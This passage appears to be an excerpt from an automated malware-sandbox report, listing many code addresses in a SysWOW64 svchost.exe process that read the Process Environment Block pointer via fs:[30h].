Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030FA352 mov eax, dword ptr fs:[00000030h] 2_2_030FA352
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D8350 mov ecx, dword ptr fs:[00000030h] 2_2_030D8350
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0310634F mov eax, dword ptr fs:[00000030h] 2_2_0310634F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D437C mov eax, dword ptr fs:[00000030h] 2_2_030D437C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h] 2_2_0302E388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h] 2_2_0302E388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h] 2_2_0302E388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305438F mov eax, dword ptr fs:[00000030h] 2_2_0305438F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305438F mov eax, dword ptr fs:[00000030h] 2_2_0305438F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03028397 mov eax, dword ptr fs:[00000030h] 2_2_03028397
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03028397 mov eax, dword ptr fs:[00000030h] 2_2_03028397
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03028397 mov eax, dword ptr fs:[00000030h] 2_2_03028397
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030EC3CD mov eax, dword ptr fs:[00000030h] 2_2_030EC3CD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h] 2_2_030383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h] 2_2_030383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h] 2_2_030383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h] 2_2_030383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B63C0 mov eax, dword ptr fs:[00000030h] 2_2_030B63C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h] 2_2_030DE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h] 2_2_030DE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DE3DB mov ecx, dword ptr fs:[00000030h] 2_2_030DE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h] 2_2_030DE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D43D4 mov eax, dword ptr fs:[00000030h] 2_2_030D43D4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D43D4 mov eax, dword ptr fs:[00000030h] 2_2_030D43D4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h] 2_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h] 2_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h] 2_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h] 2_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h] 2_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h] 2_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h] 2_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h] 2_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0304E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0304E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0304E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030663FF mov eax, dword ptr fs:[00000030h] 2_2_030663FF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302823B mov eax, dword ptr fs:[00000030h] 2_2_0302823B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B8243 mov eax, dword ptr fs:[00000030h] 2_2_030B8243
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B8243 mov ecx, dword ptr fs:[00000030h] 2_2_030B8243
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0310625D mov eax, dword ptr fs:[00000030h] 2_2_0310625D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302A250 mov eax, dword ptr fs:[00000030h] 2_2_0302A250
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03036259 mov eax, dword ptr fs:[00000030h] 2_2_03036259
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030EA250 mov eax, dword ptr fs:[00000030h] 2_2_030EA250
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030EA250 mov eax, dword ptr fs:[00000030h] 2_2_030EA250
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03034260 mov eax, dword ptr fs:[00000030h] 2_2_03034260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03034260 mov eax, dword ptr fs:[00000030h] 2_2_03034260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03034260 mov eax, dword ptr fs:[00000030h] 2_2_03034260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302826B mov eax, dword ptr fs:[00000030h] 2_2_0302826B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h] 2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h] 2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h] 2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h] 2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h] 2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h] 2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h] 2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h] 2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h] 2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h] 2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h] 2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h] 2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306E284 mov eax, dword ptr fs:[00000030h] 2_2_0306E284
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306E284 mov eax, dword ptr fs:[00000030h] 2_2_0306E284
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h] 2_2_030B0283
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h] 2_2_030B0283
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h] 2_2_030B0283
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030402A0 mov eax, dword ptr fs:[00000030h] 2_2_030402A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030402A0 mov eax, dword ptr fs:[00000030h] 2_2_030402A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h] 2_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C62A0 mov ecx, dword ptr fs:[00000030h] 2_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h] 2_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h] 2_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h] 2_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h] 2_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031062D6 mov eax, dword ptr fs:[00000030h] 2_2_031062D6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h] 2_2_030402E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h] 2_2_030402E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h] 2_2_030402E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h] 2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h] 2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h] 2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h] 2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h] 2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h] 2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h] 2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h] 2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h] 2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h] 2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DA118 mov ecx, dword ptr fs:[00000030h] 2_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h] 2_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h] 2_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h] 2_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030F0115 mov eax, dword ptr fs:[00000030h] 2_2_030F0115
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03060124 mov eax, dword ptr fs:[00000030h] 2_2_03060124
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h] 2_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h] 2_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C4144 mov ecx, dword ptr fs:[00000030h] 2_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h] 2_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h] 2_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302C156 mov eax, dword ptr fs:[00000030h] 2_2_0302C156
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C8158 mov eax, dword ptr fs:[00000030h] 2_2_030C8158
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03036154 mov eax, dword ptr fs:[00000030h] 2_2_03036154
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03036154 mov eax, dword ptr fs:[00000030h] 2_2_03036154
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03104164 mov eax, dword ptr fs:[00000030h] 2_2_03104164
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03104164 mov eax, dword ptr fs:[00000030h] 2_2_03104164
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03070185 mov eax, dword ptr fs:[00000030h] 2_2_03070185
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030EC188 mov eax, dword ptr fs:[00000030h] 2_2_030EC188
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030EC188 mov eax, dword ptr fs:[00000030h] 2_2_030EC188
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D4180 mov eax, dword ptr fs:[00000030h] 2_2_030D4180
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D4180 mov eax, dword ptr fs:[00000030h] 2_2_030D4180
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B019F mov eax, dword ptr fs:[00000030h] 2_2_030B019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B019F mov eax, dword ptr fs:[00000030h] 2_2_030B019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B019F mov eax, dword ptr fs:[00000030h] 2_2_030B019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B019F mov eax, dword ptr fs:[00000030h] 2_2_030B019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h] 2_2_0302A197
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h] 2_2_0302A197
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h] 2_2_0302A197
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030F61C3 mov eax, dword ptr fs:[00000030h] 2_2_030F61C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030F61C3 mov eax, dword ptr fs:[00000030h] 2_2_030F61C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h] 2_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h] 2_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030AE1D0 mov ecx, dword ptr fs:[00000030h] 2_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h] 2_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h] 2_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031061E5 mov eax, dword ptr fs:[00000030h] 2_2_031061E5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030601F8 mov eax, dword ptr fs:[00000030h] 2_2_030601F8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B4000 mov ecx, dword ptr fs:[00000030h] 2_2_030B4000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h] 2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h] 2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h] 2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h] 2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h] 2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h] 2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h] 2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h] 2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h] 2_2_0304E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h] 2_2_0304E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h] 2_2_0304E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h] 2_2_0304E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302A020 mov eax, dword ptr fs:[00000030h] 2_2_0302A020
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302C020 mov eax, dword ptr fs:[00000030h] 2_2_0302C020
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C6030 mov eax, dword ptr fs:[00000030h] 2_2_030C6030
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03032050 mov eax, dword ptr fs:[00000030h] 2_2_03032050
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B6050 mov eax, dword ptr fs:[00000030h] 2_2_030B6050
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305C073 mov eax, dword ptr fs:[00000030h] 2_2_0305C073
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303208A mov eax, dword ptr fs:[00000030h] 2_2_0303208A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030280A0 mov eax, dword ptr fs:[00000030h] 2_2_030280A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C80A8 mov eax, dword ptr fs:[00000030h] 2_2_030C80A8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030F60B8 mov eax, dword ptr fs:[00000030h] 2_2_030F60B8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030F60B8 mov ecx, dword ptr fs:[00000030h] 2_2_030F60B8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B20DE mov eax, dword ptr fs:[00000030h] 2_2_030B20DE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302A0E3 mov ecx, dword ptr fs:[00000030h] 2_2_0302A0E3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030380E9 mov eax, dword ptr fs:[00000030h] 2_2_030380E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B60E0 mov eax, dword ptr fs:[00000030h] 2_2_030B60E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302C0F0 mov eax, dword ptr fs:[00000030h] 2_2_0302C0F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030720F0 mov ecx, dword ptr fs:[00000030h] 2_2_030720F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306C700 mov eax, dword ptr fs:[00000030h] 2_2_0306C700
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03030710 mov eax, dword ptr fs:[00000030h] 2_2_03030710
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03060710 mov eax, dword ptr fs:[00000030h] 2_2_03060710
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306C720 mov eax, dword ptr fs:[00000030h] 2_2_0306C720
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306C720 mov eax, dword ptr fs:[00000030h] 2_2_0306C720
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306273C mov eax, dword ptr fs:[00000030h] 2_2_0306273C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306273C mov ecx, dword ptr fs:[00000030h] 2_2_0306273C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306273C mov eax, dword ptr fs:[00000030h] 2_2_0306273C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030AC730 mov eax, dword ptr fs:[00000030h] 2_2_030AC730
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306674D mov esi, dword ptr fs:[00000030h] 2_2_0306674D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306674D mov eax, dword ptr fs:[00000030h] 2_2_0306674D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306674D mov eax, dword ptr fs:[00000030h] 2_2_0306674D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03030750 mov eax, dword ptr fs:[00000030h] 2_2_03030750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030BE75D mov eax, dword ptr fs:[00000030h] 2_2_030BE75D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072750 mov eax, dword ptr fs:[00000030h] 2_2_03072750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072750 mov eax, dword ptr fs:[00000030h] 2_2_03072750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B4755 mov eax, dword ptr fs:[00000030h] 2_2_030B4755
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03038770 mov eax, dword ptr fs:[00000030h] 2_2_03038770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h] 2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h] 2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h] 2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h] 2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h] 2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h] 2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h] 2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h] 2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h] 2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h] 2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h] 2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h] 2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D678E mov eax, dword ptr fs:[00000030h] 2_2_030D678E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030307AF mov eax, dword ptr fs:[00000030h] 2_2_030307AF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E47A0 mov eax, dword ptr fs:[00000030h] 2_2_030E47A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303C7C0 mov eax, dword ptr fs:[00000030h] 2_2_0303C7C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B07C3 mov eax, dword ptr fs:[00000030h] 2_2_030B07C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030527ED mov eax, dword ptr fs:[00000030h] 2_2_030527ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030527ED mov eax, dword ptr fs:[00000030h] 2_2_030527ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030527ED mov eax, dword ptr fs:[00000030h] 2_2_030527ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030BE7E1 mov eax, dword ptr fs:[00000030h] 2_2_030BE7E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030347FB mov eax, dword ptr fs:[00000030h] 2_2_030347FB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030347FB mov eax, dword ptr fs:[00000030h] 2_2_030347FB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030AE609 mov eax, dword ptr fs:[00000030h] 2_2_030AE609
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0304260B mov eax, dword ptr fs:[00000030h] 2_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0304260B mov eax, dword ptr fs:[00000030h] 2_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0304260B mov eax, dword ptr fs:[00000030h] 2_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0304260B mov eax, dword ptr fs:[00000030h] 2_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0304260B mov eax, dword ptr fs:[00000030h] 2_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0304260B mov eax, dword ptr fs:[00000030h] 2_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0304260B mov eax, dword ptr fs:[00000030h] 2_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072619 mov eax, dword ptr fs:[00000030h] 2_2_03072619
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0304E627 mov eax, dword ptr fs:[00000030h] 2_2_0304E627
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03066620 mov eax, dword ptr fs:[00000030h] 2_2_03066620
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03068620 mov eax, dword ptr fs:[00000030h] 2_2_03068620
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303262C mov eax, dword ptr fs:[00000030h] 2_2_0303262C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0304C640 mov eax, dword ptr fs:[00000030h] 2_2_0304C640
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030F866E mov eax, dword ptr fs:[00000030h] 2_2_030F866E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030F866E mov eax, dword ptr fs:[00000030h] 2_2_030F866E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306A660 mov eax, dword ptr fs:[00000030h] 2_2_0306A660
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306A660 mov eax, dword ptr fs:[00000030h] 2_2_0306A660
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03062674 mov eax, dword ptr fs:[00000030h] 2_2_03062674
